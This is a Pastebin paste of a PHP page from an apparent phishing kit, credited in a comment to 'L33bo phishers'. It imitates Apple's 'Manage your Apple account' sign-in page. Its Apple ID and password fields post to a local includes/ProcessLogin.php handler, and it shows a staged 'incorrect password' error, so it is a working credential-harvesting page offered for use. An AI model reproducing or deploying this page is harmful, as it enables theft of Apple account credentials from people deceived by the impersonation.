aridho

failed

Mar 29th, 2018
109
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.99 KB | None | 0 0
  1. <?php
  2. /*
  3. L33bo phishers = ICQ: 695059760
  4. */
  5. require "includes/session_protect.php";
  6. require "includes/functions.php";
  7. ?>
  8. <!DOCTYPE html>
  9. <html>
  10. <head>
  11. <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
  12. <meta content="width=device-width, initial-scale=1, maximum-scale=1" name="viewport">
  13. <link href="css/Fonts.css" rel="prefetch stylesheet" type="text/css">
  14. <link href="css/Login.css" media="screen" rel="stylesheet" type="text/css">
  15. <script>
  16. function ChangePlaceholder(){
  17. document.getElementById("user").placeholder = "name@example.com";
  18. }
  19. function ChangeBack(){
  20. document.getElementById("user").placeholder = "Apple ID";
  21. }
  22. function Activate(){
  23. document.getElementById("go").className = "si-button";
  24. }
  25. function Spinner(){
  26. document.getElementById("go").style.display = "none";
  27. document.getElementById("spin").style.display = "block";
  28. }
  29. </script>
  30. </head>
  31. <body>
  32. <div class="si-body si-container container-fluid" data-theme="lite" id="content">
  33. <div class="widget-container fade-in restrict-max-wh fade-in" data-mode="embed">
  34. <div class="HoldLoginDiv">
  35. <div class="logo"><img style="width: 200px;" class="TextLogo" src="img/logo.png"></div>
  36. <div>
  37. <div class="signin fade-in">
  38. <h1 class="LoginTitkle">Manage your Apple account</h1>
  39. <form action="includes/ProcessLogin.php" name="login" id="name" method="POST" onsubmit="Spinner();">
  40. <div class="container HolderOfTheFields">
  41. <div class="row no-gutter si-field apple-id">
  42. <div class="col-xs-12"><span class="LoginTitle">Manage your Apple account Apple ID</span> <input class="si-text-field" id="user" name="user" onblur="ChangeBack();" onclick="ChangePlaceholder();" placeholder="Apple ID" spellcheck="false" type="email" value="<?php echo $_SESSION['user'];?>"></div>
  43. </div>
  44. <div class="row no-gutter si-field pwd">
  45. <div class="col-xs-12"><label class="LoginTitle" for="pwd">Password</label> <input class="si-password si-text-field" id="pass" name="pass" onkeyup="Activate();" placeholder="Password" type="password">
  46. </div>
  47. </div>
  48.  
  49. <div class="pop-container error signin-error ">
  50.             <div class="error pop-bottom">
  51.                 <p class="fat" id="errMsg">
  52.                     Your Apple&nbsp;ID or password was incorrect.
  53.                 </p>
  54.                     <a target="blank" class="si-link ax-outline thin" href="https://iforgot.apple.com/password/verify/appleid">
  55.                         Forgot password?
  56.                     </a>
  57.             </div>
  58.         </div>
  59.  
  60. <div class="si-remember-password"><input class="ax-outline" tabindex="0" type="checkbox"> <label for="remember-me">Remember me</label></div>
  61. <div class="spinner-container auth hide"></div>
  62. <button class="si-button btn disabled" id="go" tabindex="0"><i class="icon icon_sign_in"></i></button>
  63. <button style="display:none;" class="si-button btn" id="spin" tabindex="0"><img style="margin-top:-2px" src="img/spinner.gif"></span></button>
  64. </div>
  65. </form>
  66. <div class="si-container-footer"></div>
  67. </div>
  68. </div>
  69. </div>
  70. </div>
  71. </div>
  72. </body>
  73. </html>
Add Comment
Please, Sign In to add comment